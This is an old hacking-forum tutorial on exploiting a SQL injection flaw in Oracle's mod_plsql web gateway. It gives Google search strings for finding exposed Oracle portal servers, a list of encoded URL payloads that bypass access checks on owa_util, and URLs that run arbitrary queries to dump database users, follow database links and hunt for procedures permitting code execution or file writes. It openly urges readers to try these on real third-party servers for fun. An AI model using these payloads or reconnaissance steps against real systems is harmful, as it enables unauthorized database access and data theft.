Oracle Hacking Published by : ghost, on Thursday, 09 November 2006 23:52 Visited 460 times, voted 5 times, popularity : 68%

FINDING A SERVER Below is a Google search to find a nice and easy server: http://www.google.com/search?num=100&hl=de&c2coff=1&q=%22inurl%3Apls%2Fportal%22 http://www.google.co.uk/search?hl=en&q=inurl%3Aowa_util. http://www.google.co.uk/search?hl=en&q=inurl%3Aowa_util.+inurl%3Apls&meta= Alternatively you can type "inurl:/pls/portal" in the Google search box. This wi ll return a list of Oracle portal servers, it is not guaranteed the exploit will work on the server but it shows how easy it is to find targets. MOD_PLSQL ?MOD_PLSQL is an Apache (Web Server) extension module that allows one to create dynamic web pages from PL/SQL packages and stored procedures. It is ideal for de veloping fast and flexible applications that can run on the Internet or an Intra net. MOD_PLSQL was formerly called the Oracle PL/SQL Cartridge and OWA (Oracle W eb Agent).? Although MOD_PLSQL initially appears to produce web pages it basically calls a s tored procedure, this procedure can be a web page or something else. This means you can use the mod_plsql to call functions never intended to be web facing in a ddition to built-in Oracle packages eg. primary DBMS_, owa_ package and any othe r procedure or package available. Vulnerability Analysis The vulnerability is a classic SQL injection bug. Mod_plsql dynamically generate s an anonymous PL/SQL block in order to authorize and execute the requested pack age or procedure. The package/procedure name and passed parameter names are inse rted into the PL/SQL block without proper validation. It is interesting to note but not relevant with this issue that the Oracle Applications custom authorizati on will not reject an invalid object call, rather it will assume a non-existent package/procedure has been called and accept it. EXPLOITING THE OWA_ Now we have a list of potential servers we try the following: Type the following into the web browser URL http://www.webserver.com /pls/portal /<<freefghfghftext>>owa_util.signature You should get ?This page was produced by the PL/SQL Web ToolKit on July xx, 200 6 0x:xx AM?; if you get page Not Found or Forbidden then you do not have access to this package go to the next server in your list You can also try http://www.sitename.com/pls/dadname/%20.owa_util.signature http:// www.sitename.com/pls/dadname/%0A.owa_util.signature http:// www.sitename.com/pls/dadname/%08.owa_util.signature http:// www.sitename.com/pls/dadname/%0ASYS.owa_util.signature http:// www.sitename.com/pls/dadname/S%FFS.owa_util.signature http:// www.sitename.com/pls/dad/"SYS".owa_util. signature http:// www.sitename.com/pls/dad/ S%9FS.owa_util. signature

Once access has been gained the real hacking can start. SQL QUERY THE REMOTE DATABASE http:// www.sitename.com/pls/dad /owa_util.cellsprint?p_theQuery=select * from s ys.dba_users This demonstrates how easy the query is however, is not very useful as you canno t use them unless you have access to a portal or PLSQL session. Personally I start by looking for other databases http:// www.sitename.com/pls/dad /owa_util.cellsprint?p_theQuery=select * from a ll_database_links This will show any other database this database can link to e.g. http:// www.sitename.com/pls/dad /owa_util.cellsprint?p_theQuery=select * from a ll_database_links@newdb The next step is to identify programs that can be of used for better exploits, b elow is an example SQL to substitute into the cellsprint. Select name from all_source where UPPER (text) like ?%UTL_%? Select name from all_source where text UPPER(like) ?%EXECUTE%? Often you will obtain a list of procedure names which may be even better than th e current exploit, anything containing ?EXECUTE? may allow you to create a custo m PLSQL block allowing you to create a procedure on the database, or give access to UTL_FILE allowing you to create a file on the database. Once you have a list of functions to inspect you can use the following: www.sitename.com/pls/dad/owa_util.cellsprint?owa_util.showsource?cname=owa_util Now you can see the source. CONCLUTION This exploit is very good fun, but does require knowledge of SQL and PLSQL to ma ke it useful. Oracle of course has published workarounds but there are plenty of databases on the web which can be accessed this way. This exploit really is a dream come true for the hacker, Have fun!!!!!!!!! **This Articles is Related to www.hackthissite.org and was published by technote **